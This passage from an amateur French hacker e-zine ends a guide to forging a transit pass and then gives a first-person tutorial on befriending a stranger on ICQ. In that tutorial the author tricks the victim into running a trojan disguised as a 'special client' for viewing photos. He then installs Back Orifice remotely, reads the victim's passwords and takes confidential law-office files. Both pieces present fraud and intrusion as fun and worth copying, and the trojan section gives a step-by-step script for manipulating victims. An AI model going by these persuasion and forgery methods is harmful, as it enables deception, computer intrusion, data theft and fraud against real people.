tu le sort sur une bonne imprimante (en qualité photo), tu découpe ton vrai-faux abonnement, tu marques ton numéro de carte dessus et tu le mais sous la zone plastifier de ta carte qui est prévue à cet effet. Regarde bien si c’est suffisamment ressemblant et en cas de doute, jette ce ticket et recommence avec une meilleure imprimante (après une certaine limite, avoir des couilles trop grosses ça s’appelle de la connerie). lors du contrôle tu montre ta carte la gardant en main et tu essayes de parler au contrôleur pour qu’il fasse pas trop gaffe... conclusion faite vous plaisir avec l’argent que vous économiserez... et s iun bon jour avec toute cette thune épargnée vous décidez de créer une société de transport : pensez aux jeunes et aux démunis ;-) =============================================================================================== L'aspect psychologique du Troyen By DRooPY =============================================================================================== Je vais vous expliquer dans cet article comment j'ai réussi à entrer sur un PC plus qu'intéressant en utilisant une méthode assez basique, connue depuis la Grèce antique, celle du Cheval de Troie. Mais comme de tels articles sont très courants sur le Net, je vais insister sur l'aspect psychologique de la chose, c'est à dire l'art de la persuasion. En effet, beaucoup d'échecs se traduisant par le refus de la cible à accepter le Trojan sont la faute du "hacker" lui même.C'est pourquoi il faut agir avec méthode : En fait cette méthode utilise le même scénario qui s'est déroulé quelques millénaires auparavant. ( Revoyez vos cours de Mythologie :-) ) Voici ce scénario : 1) Localisation de l'ennemi, Contact avec l'ennemi 2) Evaluer les forces de l'ennemi et définir nos objectifs 3)Trouver l'idée géniale ( Ulysse l'a déjà fait pour nous on n'a plus qu'a copier :-) ) 4) Mettre l'enemi en confiance ( baratinage ) -->Phase trrrèèès importante ! 5) Passer à l'action 1) Bon là alors pas de scoop :) On trouve nos victimes sur ICQ, IRC... Soit c'est quelqu'un qui vous fait chier soit c'est un illustre inconnu :) Si la personne vous fait chier volontairement, il y a peu de chances pour qu'elle accepte votre programme, c'est évident !!! La prise de contact est importante et vous devez prendre le temps de " faire connaissance " avec la victime, ce qui sa traduit par au moins une vingtaine de messages échangés avec elle. Vous devez être sympa et il ne faut pas qu'elle se doute que derrière votre aspect angélique se cache un gros méchant. :) Exemple de prise de contact sur ICQ : ( Je raconte ici ma propre expérience avec ma victime qui était en l'occurence mexicain ce qui m'a obligé a ressortir mon dictionnaire d'espagnol ! Heureusement qu'on a parlé anglais après... Je la raconte ici en francais bien sûr ! :) ) Appelons "Lamer" ma victime : Je trouve Lamer avec Find A Random Chat Partner : ( Type de 30 ans qui aime se faire des contacts dans le monde entier ) Salut c'est DRooPY je suis en france Salut c'est Lamer , Mexique ville de XXXXXX. Tu es un type ou une nana, et tu as quel âge ? Type de XX ans. Moi type de XX ans. (( ( Et je te préviens je suis pas pédé !!! :) ) non je déconne )) ok Et qu'est ce que tu fais dans la vie, études ou travail ? ( ptain c'est un interrogatoire ou koa ??? ) Etudes Etudes au Lycée ou à l'Université ? XXXXXXXXXX ( g poa envie de vous le dire :) ) Dans quelle ville ? ( non mais je rêve il doit être flic !!! ) XXXXX Ok Puis là on a commencé à parler de vin, de Tequila, de nos familles,... Bon ceci n'est qu'un exemple mais c'est pour vous montrer qu'il faut parler de tout, le mettre en confiance. Profitez en pour essayer de connaitre son niveau en informatique en disant : Moi j'aime bof les PC j'aime que le Net, et lui va vous répondre moi oui mais je suis pas très fort ou alors moi beaucoup je suis informaticien. 2) En connaissant son niveau en informatique vous avez évalué ses forces . Vos objectifs peuvent être la vengeance, le Fun... Personnellement c'était le Fun. 3) L'idée géniale c'est de lui envoyer un Trojan :)) 4) Et voilà la phase la plus importante Il m'a demandé si je voulais sa photo : j'ai dit oui. ( il a une tronche de Q en plus ! ) La mienne je l'ai pas sur mon PC mais avec un pote j'ai créé un site sur lequel y'a ma photo. Donne l'adresse ... Mais le probleme c'est qu'il faut un client spécial pour y accéder . ??? ( il est largué le pauvre ) Attends je te l'envoie c'est un programme qu'on vient de faire avec mon pote Installe-le et clickes sur Homepage.exe ( astuce pour se rendre crédible ) Ok envoie C'est parti... L'important est de rendre crédible votre programme et de l'envoyer au bon moment --> PATIENCE NE SOYEZ PAS PRESSE !!! 5) Je lui envoie le Socket de Troie 30 secondes plus tard il l'exécute. Je me connecte chez lui, je lui envoie avec le Sock2.3 Back Orifice que je place dans C:\Windows\System et je l'exécute à distance. Je prends le fichier LMHOSTS, je regarde ses pwds ( et ben dis donc il aime bien les sites de Q :) ) Je prends des fichiers texte au hasard comme il travaille dans un bureau judiciaire c'est tres interessant !!! ( Chèques transitant par les Bermudes, facture de téléphone, frais de voyage, salaire d'avocats...! ) Et voilà c'est tout j'espère que vous obtiendrez encore plus de réussite avec les trojans même si j'ai rien écrit de rare ... =============================================================================================== Les prochains articles + Le mot de la fin =============================================================================================== Bon voilà le 8ème numéro est deja terminé et je remercie les nombreux articles que j'ai eu. Je me tape seul la mise en page donc il y a pas mal de fautes et quelques erreurs (même pas mal) Mais ce n'est qu'un magazine d'amateur donc je n'ai pas de compte à rendre faut dire... Je fais ca pendant mes périodes de glandage donc.... Voilà longue vie à deathlyby qui continuera bien sur... Dans le n°9 : - Service Courrier - Vos articles. - Les meilleurs site Web By Cedru - Les ragôts du Net - Proxy liste - Exploit suite